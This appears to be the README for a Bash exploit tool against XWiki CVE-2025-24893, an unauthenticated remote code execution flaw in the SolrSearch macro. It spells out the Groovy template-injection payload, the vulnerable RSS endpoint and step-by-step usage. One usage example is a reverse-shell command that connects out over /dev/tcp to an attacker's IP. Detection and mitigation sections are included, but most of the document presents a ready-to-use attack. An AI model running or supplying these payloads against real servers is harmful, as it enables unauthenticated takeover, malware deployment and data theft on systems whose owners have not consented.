
Overview
This script is a refurbished Bash implementation of an exploit targeting the XWiki Platform versions affected by CVE-2025-24893. It leverages a critical unauthenticated remote code execution vulnerability that allows attackers to execute arbitrary Groovy code via a template injection flaw in the SolrSearch macro.
The original exploit implementations in Python were created by various security researchers and are adapted here for Bash users with simplified execution and enhanced usability.
Vulnerability Details
- Discoverer: John Kwak (Trend Micro's Zero Day Initiative)
- CVE: CVE-2025-24893
- CVSS Score: 9.8 (Critical)
- References:
- Description: The vulnerability stems from improper input sanitization in the SolrSearch macro within XWiki Platform. The macro fails to properly validate and sanitize user-supplied input in the
text parameter when accessed via the RSS media endpoint, allowing attackers to inject malicious Groovy code into the rendering pipeline without authentication.
Affected & Patched Versions
Affected Versions
- XWiki Platform: 5.3-milestone-2 through 15.10.10
- XWiki Platform: 16.0.0-rc-1 through 16.4.0
Patched Versions
- XWiki 15.10.11 or later
- XWiki 16.4.1 or later
- XWiki 16.5.0RC1 or later
Features
- Unauthenticated RCE: Execute arbitrary system commands without authentication.
- CSRF Token Bypass: Exploits template injection without requiring CSRF tokens.
- Background Execution: Runs commands asynchronously on the target server.
- Simple Command-Line Interface: Easy-to-use Bash script with minimal dependencies.
Prerequisites
- Dependencies:
curl: For sending HTTP requests.
jq: For URL encoding the payload.
- Bash shell.
- Tested Environment: Linux OS with Bash.
Usage
Provide the Execution permissions:
chmod +x CVE-2025-24893
Run the script with the required arguments:
./CVE-2025-24893 <target_url> <command>
Parameters
| Parameter | Description |
|---|
<target_url> | The target XWiki URL (e.g., http://example.com or https://xwiki.example.org). Protocol is optional. |
<command> | The system command to execute on the target server. |
Example
Check if target is vulnerable (execute id command):
./CVE-2025-24893 http://vulnerable-xwiki.example.com "id"
Retrieve system information:
./CVE-2025-24893 http://vulnerable-xwiki.example.com "uname -a"
Create a test file:
./CVE-2025-24893 http://vulnerable-xwiki.example.com "touch /tmp/pwned"
Reverse shell (replace with your IP and port):
./CVE-2025-24893 http://vulnerable-xwiki.example.com "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"
Script Workflow
-
Command-line Argument Parsing:
- Validates that both target URL and command are provided.
- Normalizes the URL by adding
http:// if no protocol is specified.
-
Payload Construction:
- Builds a Groovy code payload that executes the specified command using
.execute().
- Wraps the payload in XWiki macro syntax:
}}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}
-
URL Encoding:
- URL-encodes the payload using
jq for proper HTTP transmission.
-
Exploitation:
- Sends an HTTP GET request to the vulnerable SolrSearch endpoint:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=<encoded_payload>
- Command executes in the background on the target server.
Technical Details
Exploitation Mechanism
The exploit chain works as follows:
- Template Injection: The attacker crafts a malicious payload containing Groovy code wrapped in XWiki macro syntax.
- Endpoint Targeting: The payload is sent to the vulnerable SolrSearch RSS endpoint.
- Code Execution: The injected Groovy code is executed server-side without authentication.
- System Compromise: The attacker gains arbitrary code execution with the privileges of the XWiki application.
Payload Structure
}}}{{async async=false}}{{groovy}}'<command>'.execute();{{/groovy}}{{/async}}
}}} - Closes any existing macro context
{{async async=false}} - Ensures synchronous execution
{{groovy}}...{{/groovy}} - Wraps the malicious Groovy code
'<command>'.execute(); - Executes the specified system command
Proof of Concept
Vulnerable Environment Setup
For testing purposes, you can set up a vulnerable XWiki instance using Docker:
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10
Exploitation Demo
# Wait for XWiki to start (may take 1-2 minutes)
./CVE-2025-24893 http://localhost:8080 "whoami"
Impact
Successful exploitation of this vulnerability allows an unauthenticated attacker to:
- Execute arbitrary system commands on the server
- Read, modify, or delete sensitive data
- Compromise the entire XWiki installation
- Pivot to other systems on the network
- Deploy cryptocurrency miners or other malware
- Establish persistent backdoor access
Real-World Exploitation
According to CISA and multiple security vendors:
- Active Exploitation: CVE-2025-24893 is being actively exploited in the wild
- Attack Campaigns: VulnCheck detected two-stage attack chains deploying cryptocurrency miners
- CISA KEV Catalog: Added to Known Exploited Vulnerabilities catalog on October 30, 2025
- Widespread Scanning: Mass internet-wide scanning for vulnerable instances
Detection & Mitigation
Detection
Monitor for suspicious requests to the SolrSearch endpoint:
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*
Look for patterns containing:
{{groovy}}
{{async}}
.execute()
- URL-encoded variations of the above
Indicators of Compromise (IoCs)
- Unexpected processes spawned by the XWiki application user
- New files in
/tmp or other writable directories
- Outbound network connections to unknown IPs
- Cryptocurrency mining processes (high CPU usage)
Mitigation
-
Upgrade XWiki to a patched version:
- Version 15.10.11 or later
- Version 16.4.1 or later
- Version 16.5.0RC1 or later
-
Apply Temporary Workarounds (if immediate patching is not possible):
- Restrict access to the SolrSearch endpoint via Web Application Firewall (WAF)
- Disable the SolrSearch macro if not required
- Implement network segmentation to limit exposure
-
Monitor for Compromise:
- Review logs for exploitation attempts
- Check for unauthorized file modifications
- Scan for cryptocurrency miners and backdoors
Limitations
- Commands execute in the background; output may not be immediately visible.
- Verification of command execution requires side-channel methods (e.g., creating files, network connections).
- Requires the target to have the SolrSearch macro enabled (default configuration).